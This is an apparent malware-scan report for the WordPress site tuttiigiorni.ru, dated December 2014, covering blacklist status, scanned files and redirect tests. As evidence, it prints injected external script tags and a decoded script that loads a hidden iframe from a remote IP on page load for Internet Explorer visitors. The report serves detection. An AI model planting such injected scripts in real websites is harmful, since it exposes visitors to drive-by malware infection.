Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tuttiigiorni.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.tuttiigiorni.ru/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Sat, 27 Dec 2014 13:30:27 GMT Location: http://tuttiigiorni.ru/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Sat, 27 Dec 2014 13:30:27 GMT X-Pingback: http://tuttiigiorni.ru/xmlrpc.php | clean |
http://tuttiigiorni.ru/ | 500 Internal Server Error Content-Length: 3919 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.clickevents.com.my ...[3958 bytes skipped]... jQuery(this).find('img').css({'margin-top': -new_height/2}); } else{ jQuery('.slides li').each(function() { jQuery(this).find('img').height(height_div); }); } }); } }); }); </script> <script type="text/javascript" src="http://122.155.168.105/ads/inpage/pub/collect.js"></script><script type="text/javascript" src="http://www.clickevents.com.my/scripts/collect.js"></script></head> <body class="home page pat1 top-navbar" > <div id="wrapper"> <div id="wrap-tutti"> <div class="wrapselectbox"> <ul> | ||
http://tuttiigiorni.ru/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://www.tuttiigiorni.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7199 Content-Type: application/javascript | clean |
http://tuttiigiorni.ru/wp-content/themes/theme/assets/js/jquery-1.10.2.min.js | 200 OK Content-Length: 93106 Content-Type: application/javascript | clean |
http://tuttiigiorni.ru/wp-content/themes/theme/assets/js/carusel.js | 200 OK Content-Length: 2928 Content-Type: application/javascript | clean |
http://tuttiigiorni.ru/wp-content/themes/theme/assets/js/valid_form.js | 200 OK Content-Length: 4093 Content-Type: application/javascript | clean |
http://tuttiigiorni.ru/wp-content/news_slider/js/demo.js | 200 OK Content-Length: 400 Content-Type: application/javascript | clean |
http://tuttiigiorni.ru/wp-content/news_slider/js/jquery.flexslider.js | 200 OK Content-Length: 51910 Content-Type: application/javascript | clean |
http://122.155.168.105/ads/inpage/pub/collect.js | 500 Can't connect to 122.155.168.105:80 (Ð Ñоединении оÑказано) Content-Length: 221 Content-Type: text/plain | clean |
http://122.155.168.105/test404page.js | 500 Can't connect to 122.155.168.105:80 (Ð Ñоединении оÑказано) Content-Length: 221 Content-Type: text/plain | clean |
http://www.clickevents.com.my/scripts/collect.js | 200 OK Content-Length: 1944 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: 176.102.38.75 ...[1185 bytes skipped]... indows'; return (outstr); } else return (false); } function SVB() { var dtstr = BDN(); if (dtstr[0]) { if (dtstr[0] == 'MSIE'){ var divTag = document.createElement('div'); divTag.id = 'goo'; document.body.appendChild(divTag); var googlecode = document.createElement('iframe'); googlecode.src = 'http://176.102.38.75/294p'; googlecode.width = '10px'; googlecode.height = '10px'; googlecode.setAttribute('style', 'visibility:hidden'); document.getElementById('goo').appendChild(googlecode); } } } if (window.addEventListener) { window.addEventListener('load', SVB, false); } else { window.attachEvent('onload', SVB); } Decoded script: function SVB() { var dtstr = BDN(); if (dtstr[0]) { if (dtstr[0] == "MSIE") { var divTag = document.createElement("div"); divTag.id = "goo"; document.body.appendChild(divTag); var googlecode = document.createElement("iframe"); googlecode.src = "http://176.102.38.75/294p"; googlecode.width = "10px"; googlecode.height = "10px"; googlecode.setAttribute("style", "visibility:hidden"); document.getElementById("goo").appendChild(googlecode); } } } |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tuttiigiorni.ru
Result:
HTTP/1.1 500 Internal Server Error
Cache-Control: max-age=0
Connection: close
Date: Sat, 27 Dec 2014 13:30:27 GMT
Server: Apache
Content-Length: 3919
Content-Type: text/html; charset=UTF-8
Expires: Sat, 27 Dec 2014 13:30:27 GMT
Link: <http://tuttiigiorni.ru/?p=1309>; rel=shortlink
X-Pingback: http://tuttiigiorni.ru/xmlrpc.php
...3919 bytes of data.
GET / HTTP/1.1
Host: tuttiigiorni.ru
Result:
HTTP/1.1 500 Internal Server Error
Cache-Control: max-age=0
Connection: close
Date: Sat, 27 Dec 2014 13:30:27 GMT
Server: Apache
Content-Length: 3919
Content-Type: text/html; charset=UTF-8
Expires: Sat, 27 Dec 2014 13:30:27 GMT
Link: <http://tuttiigiorni.ru/?p=1309>; rel=shortlink
X-Pingback: http://tuttiigiorni.ru/xmlrpc.php
...3919 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tuttiigiorni.ru
Referer: http://www.google.com/search?q=tuttiigiorni.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tuttiigiorni.ru
Referer: http://www.google.com/search?q=tuttiigiorni.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.